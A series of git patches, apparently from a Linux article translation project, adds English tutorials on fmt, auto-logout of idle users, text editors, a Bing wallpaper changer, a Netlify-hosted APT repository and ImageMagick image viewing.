+Agreed, fmt offers limited features, but you can't say it has a limited audience, the reason being that you never know when you may need it. In this tutorial, we've covered the majority of the command line options that fmt offers. For more details, head to the tool's [man page][9].
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-fmt-command/
+
+作者:[Himanshu Arora][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_fmt_command/fmt-basic-usage.png
+[2]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-basic-usage.png
+[3]:https://www.howtoforge.com/images/linux_fmt_command/fmt-w-option.png
+[4]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-w-option.png
+[5]:https://www.howtoforge.com/images/linux_fmt_command/fmt-t-option.png
+[6]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-t-option.png
+[7]:https://www.howtoforge.com/images/linux_fmt_command/fmt-s-option.png
+[8]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-s-option.png
+[9]:https://linux.die.net/man/1/fmt
From bbb3e70b3f17c1d6820387c9c510e7a5cc2c961d Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:52:21 +0800
Subject: [PATCH 051/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Auto?=
=?UTF-8?q?=20Logout=20Inactive=20Users=20After=20A=20Period=20Of=20Time?=
=?UTF-8?q?=20In=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...e Users After A Period Of Time In Linux.md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
diff --git a/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md b/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
new file mode 100644
index 0000000000..ad6ac12b1d
--- /dev/null
+++ b/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
@@ -0,0 +1,135 @@
+translating by lujun9972
+How To Auto Logout Inactive Users After A Period Of Time In Linux
+======
+
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/logout-720x340.jpg)
+
+Let us picture this scenario. You have a shared server which is regularly accessed by many users from all systems in the network. There is a chance that some user may forget to log out and leave his session open. As we all know, leaving a user session open is dangerous, and some users may even do damage intentionally. Would you, as a system admin, go and check each and every system to verify whether the users have logged out or not? That's not necessary, and it's also quite a time-consuming process if you have hundreds of machines in your network. Instead, you can make a user log out automatically from a local or SSH session after a particular period of inactivity. This brief tutorial describes how to auto logout inactive users after a particular period of time in Unix-like systems. It's not that difficult. Follow me.
+
+### Auto Logout Inactive Users After A Period Of Time In Linux
+
+We can do it in three ways. Let us see the first method.
+
+**Method 1:**
+
+Edit **~/.bashrc** or **~/.bash_profile** file:
+```
+$ vi ~/.bashrc
+```
+
+Or,
+```
+$ vi ~/.bash_profile
+```
+
+Add the following lines in it.
+```
+TMOUT=100
+```
+
+This makes the user log out automatically after 100 seconds of inactivity. You can define this value as per your convenience. Save and close the file.
+
+Apply the changes by running the following command:
+```
+$ source ~/.bashrc
+```
+
+Or,
+```
+$ source ~/.bash_profile
+```
+
+Now, leave the session idle for 100 seconds. After 100 seconds of inactivity, you will see the following message and the user will automatically be logged out from the session.
+```
+timed out waiting for input: auto-logout
+Connection to 192.168.43.2 closed.
+```
+
+This setting can easily be modified by the user, because the ~/.bashrc file is owned by the user himself.
+
+To modify or delete this timeout setting, simply delete the lines added above and apply the changes by running the "source ~/.bashrc" command.
+
+Alternatively, the user can disable this by running the following commands:
+```
+$ export TMOUT=0
+```
+
+Or,
+```
+$ unset TMOUT
+```
+
+If you want to prevent the user from changing the settings, follow the second method instead.
+
+**Method 2:**
+
+Log in as root user.
+
+Create a new file called **"autologout.sh"**.
+```
+# vi /etc/profile.d/autologout.sh
+```
+
+Add the following lines:
+```
+TMOUT=100
+readonly TMOUT
+export TMOUT
+```
+
+Save and close the file.
+
+Make it executable using the command:
+```
+# chmod +x /etc/profile.d/autologout.sh
+```
+
+Now, log out or reboot your system. The inactive user will automatically be logged out after 100 seconds. A normal user can't change this setting even if he/she wants to stay in the session; they will be thrown out after exactly 100 seconds.
+
+These two methods are applicable to both local and remote sessions, i.e. users logged in locally and/or users logged in from a remote system via SSH. Next, we are going to see how to automatically log out only inactive SSH sessions, not local sessions.
+
+**Method 3:**
+
+In this method, we will make only the SSH session users log out after a particular period of inactivity.
+
+Edit **/etc/ssh/sshd_config** file:
+```
+$ sudo vi /etc/ssh/sshd_config
+```
+
+Add/modify the following lines:
+```
+ClientAliveInterval 100
+ClientAliveCountMax 0
+```
+
+Save and close this file. Restart the sshd service for the changes to take effect.
+```
+$ sudo systemctl restart sshd
+```
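+
+To double-check that sshd picked up the new values, you can dump its effective configuration (a quick sanity check; run as root):
+```
+$ sudo sshd -T | grep -i clientalive
+clientaliveinterval 100
+clientalivecountmax 0
+```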
+
+Now, ssh to this system from a remote system. After 100 seconds, the ssh session will be automatically closed and you will see the following message:
+```
+$ Connection to 192.168.43.2 closed by remote host.
+Connection to 192.168.43.2 closed.
+```
+
+Now, whoever accesses this system from a remote system via SSH will automatically be logged out after 100 seconds of inactivity.
+
+Hope this helps. I will be soon here with another useful guide. If you find our guides helpful, please share them on your social, professional networks and support OSTechNix!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/auto-logout-inactive-users-period-time-linux/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
From b5ae04fd155b3116444dab81787294095fec3096 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:57:22 +0800
Subject: [PATCH 052/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=203=20text=20editor?=
=?UTF-8?q?=20alternatives=20to=20Emacs=20and=20Vim?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...xt editor alternatives to Emacs and Vim.md | 102 ++++++++++++++++++
1 file changed, 102 insertions(+)
create mode 100644 sources/tech/20170918 3 text editor alternatives to Emacs and Vim.md
diff --git a/sources/tech/20170918 3 text editor alternatives to Emacs and Vim.md b/sources/tech/20170918 3 text editor alternatives to Emacs and Vim.md
new file mode 100644
index 0000000000..742e1d9f92
--- /dev/null
+++ b/sources/tech/20170918 3 text editor alternatives to Emacs and Vim.md
@@ -0,0 +1,102 @@
+3 text editor alternatives to Emacs and Vim
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/computer_keyboard_laptop_development_blue.png?itok=IfckxN48)
+
+Before you start reaching for those implements of mayhem, Emacs and Vim fans, understand that this article isn't about putting the boot to your favorite editor. I'm a professed Emacs guy, but one who also likes Vim. A lot.
+
+That said, I realize that Emacs and Vim aren't for everyone. It might be that the silliness of the so-called [Editor war][1] has turned some people off. Or maybe they just want an editor that is less demanding and has a more modern sheen.
+
+If you're looking for an alternative to Emacs or Vim, keep reading. Here are three that might interest you.
+
+### Geany
+
+
+![Editing a LaTeX document with Geany][3]
+
+
+Editing a LaTeX document with Geany
+
+[Geany][4] is an old favorite from the days when I computed on older hardware running lightweight Linux distributions. Geany started out as my [LaTeX][5] editor, but quickly became the app in which I did all of my text editing.
+
+Although Geany is billed as a small and fast [IDE][6] (integrated development environment), it's definitely not just a techie's tool. Geany is small and it is fast, even on older hardware or a [Chromebook running Linux][7]. You can use Geany for everything from editing configuration files to maintaining a task list or journal, from writing an article or a book to doing some coding and scripting.
+
+[Plugins][8] give Geany a bit of extra oomph. Those plugins expand the editor's capabilities, letting you code or work with markup languages more effectively, manipulate text, and even check your spelling.
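+
+On many distributions those plugins are only an install command away. For example, on Debian- or Ubuntu-based systems they are typically bundled in a geany-plugins package (the exact package name may vary by distribution):
+```
+$ sudo apt install geany geany-plugins
+```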
+
+### Atom
+
+
+![Editing a webpage with Atom][10]
+
+
+Editing a webpage with Atom
+
+[Atom][11] is a new-ish kid in the text editing neighborhood. In the short time it's been on the scene, though, Atom has gained a dedicated following.
+
+What makes Atom attractive is that you can customize it. If you're of a more technical bent, you can fiddle with the editor's configuration. If you aren't all that technical, Atom has [a number of themes][12] you can use to change how the editor looks.
+
+And don't discount Atom's thousands of [packages][13]. They extend the editor in many different ways, enabling you to turn it into the text editing or development environment that's right for you. Atom isn't just for coders. It's a very good [text editor for writers][14], too.
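+
+Many of those packages and themes can also be installed from the command line with apm, the package manager that ships with Atom. The package names below are only examples; browse atom.io/packages for ones that suit you:
+```
+$ apm install minimap
+$ apm install atom-material-ui
+```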
+
+### Xed
+
+![Writing this article in Xed][16]
+
+
+Writing this article in Xed
+
+Maybe Atom and Geany are a bit heavy for your tastes. Maybe you want a lighter editor, something that's not bare bones but also doesn't have features you'll rarely (if ever) use. In that case, [Xed][17] might be what you're looking for.
+
+If Xed looks familiar, that's because it's a fork of the Pluma text editor for the MATE desktop environment. I've found that Xed is a bit faster and a bit more responsive than Pluma--your mileage may vary, though.
+
+Although Xed isn't as rich in features as other editors, it doesn't do too badly. It has solid syntax highlighting, a better-than-average search and replace function, a spelling checker, and a tabbed interface for editing multiple files in a single window.
+
+### Other editors worth exploring
+
+I'm not a KDE guy, but when I worked in that environment, [KDevelop][18] was my go-to editor for heavy-duty work. It's a lot like Geany in that KDevelop is powerful and flexible without a lot of bulk.
+
+Although I've never really felt the love, more than a couple of people I know swear by [Brackets][19]. It is powerful, and I have to admit its [extensions][20] look useful.
+
+Billed as a "text editor for developers," [Notepadqq][21] is an editor that's reminiscent of [Notepad++][22]. It's in the early stages of development, but Notepadqq does look promising.
+
+[Gedit][23] and [Kate][24] are excellent for anyone whose text editing needs are simple. They're definitely not bare bones--they pack enough features to do heavy text editing. Both Gedit and Kate balance that by being speedy and easy to use.
+
+Do you have another favorite text editor that's not Emacs or Vim? Feel free to share by leaving a comment.
+
+### About The Author
+Scott Nesbitt - I'm a long-time user of free/open source software, and I write various things for both fun and profit. I don't take myself too seriously and I do all of my own stunts. You can find me at these fine establishments on the web.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/9/3-alternatives-emacs-and-vim
+
+作者:[Scott Nesbitt][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/scottnesbitt
+[1]:https://en.wikipedia.org/wiki/Editor_war
+[2]:/file/370196
+[3]:https://opensource.com/sites/default/files/u128651/geany.png (Editing a LaTeX document with Geany)
+[4]:https://www.geany.org/
+[5]:https://opensource.com/article/17/6/introduction-latex
+[6]:https://en.wikipedia.org/wiki/Integrated_development_environment
+[7]:https://opensource.com/article/17/4/linux-chromebook-gallium-os
+[8]:http://plugins.geany.org/
+[9]:/file/370191
+[10]:https://opensource.com/sites/default/files/u128651/atom.png (Editing a webpage with Atom)
+[11]:https://atom.io
+[12]:https://atom.io/themes
+[13]:https://atom.io/packages
+[14]:https://opensource.com/article/17/5/atom-text-editor-packages-writers
+[15]:/file/370201
+[16]:https://opensource.com/sites/default/files/u128651/xed.png (Writing this article in Xed)
+[17]:https://github.com/linuxmint/xed
+[18]:https://www.kdevelop.org/
+[19]:http://brackets.io/
+[20]:https://registry.brackets.io/
+[21]:http://notepadqq.altervista.org/s/
+[22]:https://opensource.com/article/16/12/notepad-text-editor
+[23]:https://wiki.gnome.org/Apps/Gedit
+[24]:https://kate-editor.org/
From ead2ca9dbae2af5a1accc45cd440707088aacdae Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:59:05 +0800
Subject: [PATCH 053/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Two=20Easy=20Ways?=
=?UTF-8?q?=20To=20Install=20Bing=20Desktop=20Wallpaper=20Changer=20On=20L?=
=?UTF-8?q?inux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Bing Desktop Wallpaper Changer On Linux.md | 137 ++++++++++++++++++
1 file changed, 137 insertions(+)
create mode 100644 sources/tech/20170918 Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux.md
diff --git a/sources/tech/20170918 Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux.md b/sources/tech/20170918 Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux.md
new file mode 100644
index 0000000000..9e9dbb814c
--- /dev/null
+++ b/sources/tech/20170918 Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux.md
@@ -0,0 +1,137 @@
+Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux
+======
+Are you bored with your Linux desktop background and want to set good-looking wallpapers but don't know where to find them? Don't worry, we are here to help you.
+
+We all know about the Bing search engine, but most of us don't use it for one reason or another. Still, everyone likes the Bing website's background wallpapers, which are beautiful, stunning, high-resolution images.
+
+If you would like to have these images as your desktop wallpapers, you can set them manually, but it's tedious to download a new image daily and then set it as the wallpaper. That's where automatic wallpaper changers come into the picture.
+
+[Bing Desktop Wallpaper Changer][1] automatically downloads the Bing Photo of the Day and sets it as your desktop wallpaper. All the wallpapers are stored in `/home/[user]/Pictures/BingWallpapers/`.
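+
+Once either of the methods below has run at least once, a quick listing will confirm the downloads landed in that directory (adjust the path if you change the defaults):
+```
+$ ls ~/Pictures/BingWallpapers/
+```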
+
+### Method-1 : Using Utkarsh Gupta's Shell Script
+
+This small Python script automatically downloads the Bing Photo of the Day and sets it as the desktop wallpaper. The script runs automatically at startup and works on GNU/Linux with GNOME or Cinnamon. There is no manual work; the installer does everything for you.
+
+From version 2.0+, the installer works like a normal Linux binary command, and it requests sudo permissions for some of the tasks.
+
+Just download and extract the repository archive, navigate to the project's directory, then run the shell script to install Bing Desktop Wallpaper Changer.
+```
+$ wget https://github.com/UtkarshGpta/bing-desktop-wallpaper-changer/archive/master.zip
+$ unzip master
+$ cd bing-desktop-wallpaper-changer-master
+
+```
+
+Run the `installer.sh` file with the `--install` option to install Bing Desktop Wallpaper Changer. This will download and set the Bing Photo of the Day as your Linux desktop wallpaper.
+```
+$ ./installer.sh --install
+
+Bing-Desktop-Wallpaper-Changer
+BDWC Installer v3_beta2
+
+GitHub:
+Contributors:
+.
+.
+[sudo] password for daygeek:
+.
+.
+Where do you want to install Bing-Desktop-Wallpaper-Changer?
+ Entering 'opt' or leaving input blank will install in /opt/bing-desktop-wallpaper-changer
+ Entering 'home' will install in /home/daygeek/bing-desktop-wallpaper-changer
+ Install Bing-Desktop-Wallpaper-Changer in (opt/home)? : [Press Enter]
+
+Should we create bing-desktop-wallpaper-changer symlink to /usr/bin/bingwallpaper so you could easily execute it?
+ Create symlink for easy execution, e.g. in Terminal (y/n)? : y
+
+Should bing-desktop-wallpaper-changer needs to autostart when you log in? (Add in Startup Application)
+ Add in Startup Application (y/n)? : y
+.
+.
+Executing bing-desktop-wallpaper-changer...
+
+Finished!!
+
+```
+
+[![][2]![][2]][3]
+
+To uninstall the script, run:
+```
+$ ./installer.sh --uninstall
+
+```
+
+Check the help page to learn about more options for this script:
+```
+$ ./installer.sh --help
+
+```
+
+### Method-2 : Using GNOME Shell extension
+
+This lightweight [GNOME shell extension][4] changes your wallpaper every day to Microsoft Bing's wallpaper of the day. It also shows a notification containing the title and the explanation of the image.
+
+This extension is based extensively on the NASA APOD extension by Elinvention and inspired by Bing Desktop Wallpaper Changer by Utkarsh Gupta.
+
+### Features
+
+ * Fetches the Bing wallpaper of the day and sets as both lock screen and desktop wallpaper (these are both user selectable)
+ * Optionally force a specific region (i.e. locale)
+ * Automatically selects the highest resolution (and most appropriate wallpaper) in multiple monitor setups
+ * Optionally clean up Wallpaper directory after between 1 and 7 days (delete oldest first)
+ * Only attempts to download wallpapers when they have been updated
+ * Doesn't poll continuously - only once per day and on startup (a refresh is scheduled when Bing is due to update)
+
+
+
+### How to install
+
+Visit the [extensions.gnome.org][5] website, drag the toggle button to `ON`, then hit the `Install` button to install the Bing Wallpaper GNOME extension.
+[![][2]![][2]][6]
+
+After installing the Bing Wallpaper GNOME extension, it will automatically download and set the Bing Photo of the Day as your Linux desktop wallpaper, and it shows a notification about the wallpaper.
+[![][2]![][2]][7]
+
+The tray indicator will help you to perform a few operations and open the settings.
+[![][2]![][2]][8]
+
+Customize the settings based on your requirements.
+[![][2]![][2]][9]
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/bing-desktop-wallpaper-changer-linux-bing-photo-of-the-day/
+
+作者:[2daygeek][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://github.com/UtkarshGpta/bing-desktop-wallpaper-changer
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-linux-5.png
+[4]:https://github.com/neffo/bing-wallpaper-gnome-extension
+[5]:https://extensions.gnome.org/extension/1262/bing-wallpaper-changer/
+[6]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-for-linux-1.png
+[7]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-for-linux-2.png
+[8]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-for-linux-3.png
+[9]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-for-linux-4.png
From fa6fb775146f07cb15a5717e6d138c1adf95ec13 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:00:39 +0800
Subject: [PATCH 054/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Easy=20APT=20Repo?=
=?UTF-8?q?sitory=20=C2=B7=20Iain=20R.=20Learmonth?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Easy APT Repository - Iain R. Learmonth.md | 83 +++++++++++++++++++
1 file changed, 83 insertions(+)
create mode 100644 sources/tech/20170920 Easy APT Repository - Iain R. Learmonth.md
diff --git a/sources/tech/20170920 Easy APT Repository - Iain R. Learmonth.md b/sources/tech/20170920 Easy APT Repository - Iain R. Learmonth.md
new file mode 100644
index 0000000000..b0031f8c94
--- /dev/null
+++ b/sources/tech/20170920 Easy APT Repository - Iain R. Learmonth.md
@@ -0,0 +1,83 @@
+Easy APT Repository · Iain R. Learmonth
+======
+
+The [PATHspider][5] software I maintain as part of my work depends on some features in [cURL][6] and in [PycURL][7] that have [only][8] [just][9] been merged or are still [awaiting][10] merge. I need to build a Docker container that includes these as Debian packages, so I need to quickly build an APT repository.
+
+A Debian repository can essentially be seen as a static website and the contents are GPG signed so it doesn't necessarily need to be hosted somewhere trusted (unless availability is critical for your application). I host my blog with [Netlify][11], a static website host, and I figured they would be perfect for this use case. They also [support open source projects][12].
+
+There is a CLI tool for Netlify, which you can install with:
+```
+sudo apt install npm
+sudo npm install -g netlify-cli
+
+```
+
+The basic steps for setting up a repository are:
+```
+mkdir repository
+cp /path/to/*.deb repository/
+cd repository
+apt-ftparchive packages . > Packages
+apt-ftparchive release . > Release
+gpg --clearsign -o InRelease Release
+netlify deploy
+
+```
+
+Once you've followed these steps, and created a new site on Netlify, you'll be able to manage this site also through the web interface. A few things you might want to do are set up a custom domain name for your repository, or enable HTTPS with Let's Encrypt. (Make sure you have `apt-transport-https` if you're going to enable HTTPS though.)
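+
+On the client side, that last point just means installing the HTTPS transport before pointing APT at an https:// URL. A minimal sketch on Debian or Ubuntu:
+```
+sudo apt install apt-transport-https
+
+```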
+
+To add this repository to your apt sources:
+```
+gpg --export -a YOURKEYID | sudo apt-key add -
+echo "deb https://SUBDOMAIN.netlify.com/ /" | sudo tee -a /etc/apt/sources.list
+sudo apt update
+
+```
+
+You'll now find that those packages are installable. Beware of [APT pinning][13] as you may find that the newer versions on your repository are not actually the preferred versions according to your policy.
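+
+One way to see whether pinning is affecting you is to ask APT which version it would actually install and from which repository (replace the package name with one from your own repository):
+```
+apt-cache policy yourpackage
+
+```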
+
+**Update** : If you want a solution that would be more suitable for regular use, take a look at [reprepro][14]. If you want to have end-users add your APT repository as a third-party repository to their system, please take a look at [this page on the Debian wiki][15], which contains advice on how to instruct users to use your repository.
+
+**Update 2** : Another commenter has pointed out [aptly][16], which offers a greater feature set and removes some of the restrictions imposed by reprepro. I've never used aptly myself so I can't comment on specifics, but from the website it looks like it might be a nicely polished tool.
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://iain.learmonth.me/blog/2017/2017w383/
+
+作者:[Iain R. Learmonth][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://iain.learmonth.me
+[1]:https://iain.learmonth.me/tags/netlify/
+[2]:https://iain.learmonth.me/tags/debian/
+[3]:https://iain.learmonth.me/tags/apt/
+[4]:https://iain.learmonth.me/tags/foss/
+[5]:https://pathspider.net
+[6]:http://curl.haxx.se/
+[7]:http://pycurl.io/
+[8]:https://github.com/pycurl/pycurl/pull/456
+[9]:https://github.com/pycurl/pycurl/pull/458
+[10]:https://github.com/curl/curl/pull/1847
+[11]:http://netlify.com/
+[12]:https://www.netlify.com/open-source/
+[13]:https://wiki.debian.org/AptPreferences
+[14]:https://mirrorer.alioth.debian.org/
+[15]:https://wiki.debian.org/DebianRepository/UseThirdParty
+[16]:https://www.aptly.info/
From 1b794d4da239c9bd5a02aadf8c4bbb861138f375 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:06:39 +0800
Subject: [PATCH 055/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Advanced=20image?=
=?UTF-8?q?=20viewing=20tricks=20with=20ImageMagick?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...d image viewing tricks with ImageMagick.md | 113 ++++++++++++++++++
1 file changed, 113 insertions(+)
create mode 100644 sources/tech/20170925 Advanced image viewing tricks with ImageMagick.md
diff --git a/sources/tech/20170925 Advanced image viewing tricks with ImageMagick.md b/sources/tech/20170925 Advanced image viewing tricks with ImageMagick.md
new file mode 100644
index 0000000000..7aabd73564
--- /dev/null
+++ b/sources/tech/20170925 Advanced image viewing tricks with ImageMagick.md
@@ -0,0 +1,113 @@
+Advanced image viewing tricks with ImageMagick
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/osdc-photo-camera-green.png?itok=qiDqmXV1)
+
+In my [introduction to ImageMagick][1], I showed how to use the application's menus to edit and add effects to your images. In this follow-up, I'll show additional ways to use this open source image editor to view your images.
+
+### Another effect
+
+Before diving into advanced image viewing with ImageMagick, I want to share another interesting, yet simple, effect using the **convert** command, which I discussed in detail in my previous article. This involves the **-edge** option followed by **-negate**:
+```
+convert DSC_0027.JPG -edge 3 -negate edge3+negate.jpg
+```
+
+![Using the edge and negate options on an image.][3]
+
+
+Before and after example of using the edge and negate options on an image.
+
+There are a number of things I like about the edited image--the appearance of the sea, the background and foreground vegetation, but especially the sun and its reflection, and also the sky.
+
+### Using display to view a series of images
+
+If you're a command-line user like I am, you know that the shell provides a lot of flexibility and shortcuts for complex tasks. Here I'll show one example: the way ImageMagick's **display** command can overcome a problem I've had reviewing images I import with the [Shotwell][4] image manager for the GNOME desktop.
+
+Shotwell creates a nice directory structure that uses each image's [Exif][5] data to store imported images based on the date they were taken or created. You end up with a top directory for the year, subdirectories for each month (01, 02, 03, and so on), followed by another level of subdirectories for each day of the month. I like this structure, because finding an image or set of images based on when they were taken is easy.
+
+This structure is not so great, however, when I want to review all my images for the last several months or even the whole year. With a typical image viewer, this involves a lot of jumping up and down the directory structure, but ImageMagick's **display** command makes it simple. For example, imagine that I want to look at all my pictures for this year. If I enter **display** on the command line like this:
+```
+display -resize 35% 2017/*/*/*.JPG
+```
+
+I can march through the year, month by month, day by day.
+
+Now imagine I'm looking for an image, but I can't remember whether I took it in the first half of 2016 or the first half of 2017. This command:
+```
+display -resize 35% 201[6-7]/0[1-6]/*/*.JPG
+```
+
+restricts the images shown to January through June of 2016 and 2017.
+
+### Using montage to view thumbnails of images
+
+Now say I'm looking for an image that I want to edit. One problem is that **display** shows each image's filename, but not its place in the directory structure, so it's not obvious where I can find that image. Also, when I (sporadically) download images from my camera, I clear them from the camera's storage, so the filenames restart at **DSC_0001.jpg** at unpredictable times. Finally, it can take a lot of time to go through 12 months of images when I use **display** to show an entire year.
+
+This is where the **montage** command, which puts thumbnail versions of a series of images into a single image, can be very useful. For example:
+```
+montage -label %d/%f -title 2017 -tile 5x -resize 10% -geometry +4+4 2017/0[1-4]/*/*.JPG 2017JanApr.jpg
+```
+
+From left to right, this command starts by specifying a label for each image that consists of the filename ( **%f** ) and its directory ( **%d** ) structure, separated with **/**. Next, the command specifies the main directory as the title, then instructs the montage to tile the images in five columns, with each image resized to 10% (which fits my monitor's screen easily). The geometry setting puts whitespace around each image. Finally, it specifies which images to include in the montage, and an appropriate filename to save the montage ( **2017JanApr.jpg** ). So now the image **2017JanApr.jpg** becomes a reference I can use over and over when I want to view all my images from this time period.
+
+### Managing memory
+
+You might wonder why I specified just a four-month period (January to April) for this montage. Here is where you need to be a bit careful, because **montage** can consume a lot of memory. My camera creates image files that are about 2.5MB each, and I have found that my system's memory can pretty easily handle 60 images or so. When I get to around 80, my computer freezes when other programs, such as Firefox and Thunderbird, are running in the background. This seems to relate to memory usage, which goes up to 80% or more of available RAM for **montage**. (You can check this by running **top** while you do this procedure.) If I shut down all other programs, I can manage 80 images before my system freezes.
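+
+If you'd rather not keep **top** open, a simple alternative is to watch the memory numbers refresh in a second terminal while **montage** runs (a quick sketch using the standard watch and free utilities):
+```
+watch -n 2 free -h
+```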
+
+Here's how you can get some sense of how many files you're dealing with before running the **montage** command:
+```
+ls 2017/0[1-4]/*/*.JPG > filelist; wc -l filelist
+```
+
+The command **ls** generates a list of the files in our search and saves it to the arbitrarily named filelist. Then, the **wc** command with the **-l** option reports how many lines are in the file, in other words, how many files **ls** found. Here's my output:
+```
+163 filelist
+```
+
+Oops! There are 163 images taken from January through April, and creating a montage of all of them would almost certainly freeze up my system. I need to trim down the list a bit, maybe just to March or even earlier. But suppose I took a lot of pictures from April 20 to 30, and I suspect that's a big part of my problem. Here's how the shell can help us figure this out:
+```
+ls 2017/0[1-3]/*/*.JPG > filelist; ls 2017/04/0[1-9]/*.JPG >> filelist; ls 2017/04/1[0-9]/*.JPG >> filelist; wc -l filelist
+```
+
+This is a series of four commands all on one line, separated by semicolons. The first command lists the images taken from January through March; the second adds April 1 through 9 using the **>>** append operator; the third appends April 10 through 19. The fourth command, **wc -l**, reports:
+```
+81 filelist
+```
+
+I know 81 files should be doable if I shut down my other applications.
+
+Managing this with the **montage** command is easy, since we're just transposing what we did above:
+```
+montage -label %d/%f -title 2017 -tile 5x -resize 10% -geometry +4+4 2017/0[1-3]/*/*.JPG 2017/04/0[1-9]/*.JPG 2017/04/1[0-9]/*.JPG 2017Jan01Apr19.jpg
+```
+
+The last filename in the **montage** command will be the output; everything before that is input and is read from left to right. This took just under three minutes to run and resulted in an image about 2.5MB in size, but my system was sluggish for a bit afterward.
+
+### Displaying the montage
+
+When you first view a large montage using the **display** command, you may see that the montage's width is OK, but the image is squished vertically to fit the screen. Don't worry; just left-click the image and select **View > Original Size**. Click again to hide the menu.
+
+I hope this has been helpful in showing you new ways to view your images. In my next article, I'll discuss more complex image manipulation.
+
+
+### About The Author
+Greg Pittman - Greg is a retired neurologist in Louisville, Kentucky, with a long-standing interest in computers and programming, beginning with Fortran IV. When Linux and open source software came along, it kindled a commitment to learning more and eventually contributing. He is a member of the Scribus Team.
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/9/imagemagick-viewing-images
+
+作者:[Greg Pittman][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/greg-p
+[1]:https://opensource.com/article/17/8/imagemagick
+[2]:/file/370946
+[3]:https://opensource.com/sites/default/files/u128651/edge3negate.jpg (Using the edge and negate options on an image.)
+[4]:https://wiki.gnome.org/Apps/Shotwell
+[5]:https://en.wikipedia.org/wiki/Exif
From e79ef921ad0c608f079d8a2cf6467bc73fcfa54f Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:08:18 +0800
Subject: [PATCH 056/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20Free=20Co?=
=?UTF-8?q?mmand=20Explained=20for=20Beginners=20(6=20Examples)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Explained for Beginners (6 Examples).md | 120 ++++++++++++++++++
1 file changed, 120 insertions(+)
